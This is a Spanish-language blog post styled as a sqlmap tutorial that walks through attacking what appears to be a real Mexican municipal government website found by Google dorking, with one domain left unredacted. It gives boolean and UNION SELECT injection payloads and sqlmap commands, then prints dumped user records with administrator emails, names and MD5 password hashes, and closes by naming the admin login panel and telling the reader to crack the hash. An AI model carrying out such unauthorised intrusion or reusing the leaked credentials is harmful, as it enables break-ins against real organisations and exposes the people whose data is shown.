SQLMAP – Pentesting

      No hay comentarios en SQLMAP – Pentesting

Probaremos la herramienta sqlmap, para ello buscaremos una web que nos sea de utilidad..

Vamos a google e iniciemos la busqueda: site:mx pasteleria inurl:”.php?id=”

Dentro del listado vi una que me agrado; https://***.gob.mx/

Comprobamos que es vulnerable con https://***.gob.mx/boletines.php?id=3887 and 1=0 y https://***.gob.mx/boletines.php?id=3887 and 1=1

como vimos si es vulnerable entonces ahora buscamos cuantas columnas hay con https://***.gob.mx/boletines.php?id=3887 order by 27 y nos damos cuenta que hay 27 columnas
https://***.gob.mx/boletines.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27–

———————-
https://***.gob.mx/boletines.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(email,0x3a,password,0x3a,status),19,20,21,22,23,24,25,26,27%20from%20usuarios%20limit%201,1–
———————-

Bueno mejor usemos ya sqlmap que lo podemos descargar de http://sqlmap.org/ junto con python https://www.python.org/downloads/

Si estamos en windows abrimos la consola y nos cambiamos a la carpeta de python y ejecutamos el escaneo con sqlmap:

C:\Python27>python C:\Users\0x\Desktop\sqlm\sqlmap.py -u “https://chimalhuacan.gob.mx/boletines.php?id=3887” –batch –banner

Después vemos las bases de datos:

C:\Python27>python C:\Users\0x\Desktop\sqlm\sqlmap.py -u “https://***.gob.mx/boletines.php?id=3887” –batch –dbs

[00:16:12] [INFO] retrieved: ‘***’
[00:16:14] [INFO] retrieved: ‘***’

Ahora sus tablas:

C:\Python27>python C:\Users\0x\Desktop\sqlm\sqlmap.py -u “https://***.gob.mx/boletines.php?id=3887” –batch –tables -D ***

Database: ***
[8 tables] 

+—————-+
| Contacto       |
| Contenidos     |
| Micrositios    |
| Recursos       |
| banners        |
| fwsdocs        |
| fwsdocs_folder |
| usuarios       |
+—————-+

Veamos los datos de usuarios:

Database: ****

Table: usuarios

[4 entries]

+——+————+—————————————-+———-+——————–+————+————————————-+————+———————+——————————————–+

| ids1 | id_usuario | email                                  | status   | acceso             | vdesde     | nombre                              | vhasta     | ult_sesion          | password                                   |

+——+————+—————————————-+———-+——————–+————+————————————-+————+———————+——————————————–+

| NULL | 1          | [email protected]                 | Inactivo | Atencion Ciudadana | 2017-02-21 | Acceso Demo                         | 2025-01-01 | 2017-11-10 16:13:09 | 2e771fe4f4354532dbc49c9c9a45e81f (*******) |

| NULL | 6          | webadmin@***.gob.mx           | Activo   | Administrador      | 2017-02-11 | Admin Municipio                     | 2025-02-11 | 2020-06-19 17:23:20 | 7521e4a3f348ecce94e7c6b5ce440d90           |

| NULL | 7          | [email protected]                 | Activo   | Administrador      | 2017-02-11 | Alejandro Cortes                    | 2025-02-11 | 2020-06-15 15:49:17 | 8e3a4fe0f82a1685bdeccedee8bda94e

webadmin@***.gob.mx7521e4a3f348ecce94e7c6b5ce440d90Activo

Buscamos el panel, en este caso:

https://***.gob.mx/Olimpo/login.php

y solo queda crackear el hash md5 7521e4a3f348ecce94e7c6b5ce440d90

Deja un comentario